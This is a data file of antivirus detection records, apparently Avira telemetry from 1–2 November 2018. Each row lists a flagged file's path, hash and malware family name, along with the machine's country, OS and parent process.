  Row(detection=Row(filename='avscan-20181102-052025-f942c72e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052025-F942C72E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053323-c8fa8364', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053323-C8FA8364', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054103-db77b543', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054103-DB77B543', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062319-c29b690f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062319-C29B690F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050612-fcf9ebfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050612-FCF9EBFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055429-bb7edf1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055429-BB7EDF1D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054142-f2a512cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054142-F2A512CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060743-94d8a1cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060743-94D8A1CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060704-7dd2a33e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060704-7DD2A33E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051958-e9807ea5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051958-E9807EA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060107-a8e7b452', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060107-A8E7B452', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053350-d900d1e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053350-D900D1E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:08:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:58:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050626-050ca2ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050626-050CA2EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-171856-ca8c1d5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae6e045\\AVSCAN-20181101-171737-BC4477FC\\AVSCAN-20181101-171856-CA8C1D5F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:18:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp10526790\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:19:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155742-d309f80b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155742-D309F80B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cg.dll', filepath='D:\\Virtools\\Virtools 4.0\\cg.dll', filesize=2048000, name='W32/Ramnit.CD.#M1.#R1'), hash='1bbc6c89ff43e90be6f6e822e63a132fc00167744f45cb05610ce3d6559b6d31', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:38:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1103f6fbcf2aa324d840f010a8ef613aaf4c613b39bc2a800e85366f38d2e91f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\1103F6FBCF2AA324D840F010A8EF613AAF4C613B39BC2A800E85366F38D2E91F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1103f6fbcf2aa324d840f010a8ef613aaf4c613b39bc2a800e85366f38d2e91f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:47:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:26:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155418-b08ceb58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155418-B08CEB58', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160209-ffff481e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160209-FFFF481E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155523-bb8faace', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155523-BB8FAACE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:19:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T06:07:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2d78fabefd783634910ace900ca49652552918ac0d2d3d8a15e3b98b22cd501f.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\2D78FABEFD783634910ACE900CA49652552918AC0D2D3D8A15E3B98B22CD501F.VIR', filesize=2560000, name='Worm/Ngrbot.adwm.#M1.#R1'), hash='2d78fabefd783634910ace900ca49652552918ac0d2d3d8a15e3b98b22cd501f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:53:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1266706\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Users\\X\\Downloads\\aTube_Catcher_3435473628.exe', parentsize=2610712, timestamp='2018-11-01T15:05:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ospprearm.exe', filepath='D:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='W32/Sality.AT.#M1.#R1'), hash='53ea434052271abcdbdf00939d217346a1e965e7a200c0ca519b352c4cbac013', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T03:44:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='C:\\Program Files (x86)\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='166cc02d31acea15ad5a0af21e30e3363b43fb5f611b2ad2bf76d8f50a746b89', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:31:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=7776000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='53751cae478390a4b50530439539fa4db6b781b3bc31a640adbdd6aad70bfe23', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2391280, timestamp='2018-11-01T22:16:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cpp.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cpp.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T21:02:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='เพลงลูกทุ่ง.exe', filepath='E:\\music\\เพลงลูกทุ่ง\\เพลงลูกทุ่ง.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='27d823625812631bb20f4546254ff0da2ca12bd99aea3b989ef753e1af58afed', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180514-6e176e05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180241-528F9759\\AVSCAN-20181101-180514-6E176E05', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:05:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154841-77e8a4a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154841-77E8A4A3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5eb9b52bb5a2ecf3f0067d38b8af45fa144c3a1818a5c8a8a231da2a5014ae87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5EB9B52BB5A2ECF3F0067D38B8AF45FA144C3A1818A5C8A8A231DA2A5014AE87', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='5eb9b52bb5a2ecf3f0067d38b8af45fa144c3a1818a5c8a8a231da2a5014ae87', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T11:29:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124632-76fb05c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124611-657C2641\\AVSCAN-20181101-124632-76FB05C9', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:46:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083518-658f7219', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4676877a\\AVSCAN-20181101-083448-5FCD14D4\\AVSCAN-20181101-083518-658F7219', filesize=20000, name='TR/Agent.40960.AH.#M1.#R1'), hash='c7403ec0cc8a25ed966164d00c0874c00c85c0dc2b1858f2a43734b0aeb2f5a7', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2_c8ae2729.exe', filepath='C:\\Users\\X\\Desktop\\Favorites\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2_c8ae2729.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:45:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='escdll.dll', filepath='C:\\Windows\\System32\\escdll.dll', filesize=60000, name='W32/Ramnit.CD.#M1.#R1'), hash='99e743b7e7015210545d206355a3ea86583c4ea5c425112276661a5ddd87bf10', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\escsrv.exe', parentsize=94208, timestamp='2018-11-01T01:25:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='icaredatarecovery.exe', filepath='K:\\HBCD\\Programs\\ICAREDATARECOVERY.EXE', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:52:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='788a7154c56f23cf8dd0f4385223c47eaeffc9cbdbb8da9b6b18311f6d0fbf20', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\788A7154C56F23CF8DD0F4385223C47EAEFFC9CBDBB8DA9B6B18311F6D0FBF20', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='788a7154c56f23cf8dd0f4385223c47eaeffc9cbdbb8da9b6b18311f6d0fbf20', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111331-0ded850e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111331-0DED850E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='poweriso 6.6 and serial key.exe', filepath='C:\\Users\\X\\Desktop\\nera\\# (installer prog. base)\\# (creare file iso)\\PowerISO\\PowerISO 6.6 and Serial Key\\PowerISO 6.6 and Serial Key.exe', filesize=6144000, name='HEUR/AGEN.1011383.#M1.#R1'), hash='e06e83b21a0aab3d0107dd1bc2fe903113726aa2a0277e66e300374a30008706', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:04:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{7C80A650-D973-4BF6-921E-85B0550B4B4D} S-1-5-18:NT AUTHORITY\\\\System:Service:', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:40:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='83b4aa2e7a2bac23f3dca6ac64d8d28a81d3fce98b66743b8581627181f3b9e4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\83B4AA2E7A2BAC23F3DCA6AC64D8D28A81D3FCE98B66743B8581627181F3B9E4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='83b4aa2e7a2bac23f3dca6ac64d8d28a81d3fce98b66743b8581627181f3b9e4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152143-b8d031f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e694a98\\AVSCAN-20181101-152108-B361BDAE\\AVSCAN-20181101-152143-B8D031F3', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='99e802a254768b58e1b71de1966b4411b0eb2007f33ccfbced3b857646805822', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4919604.exe', filepath='\\\\?\\C:\\Program Files (x86)\\gzpem\\4919604.exe', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comptabilité.exe', filepath='G:\\photo\\comptabilité.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:51:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c046c9195a9ff385b2b09009e2de1ecef6f41d3896568fb56928dd557cc89277', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:47:49Z'), dt=datetime.date(2018, 11, 1)),
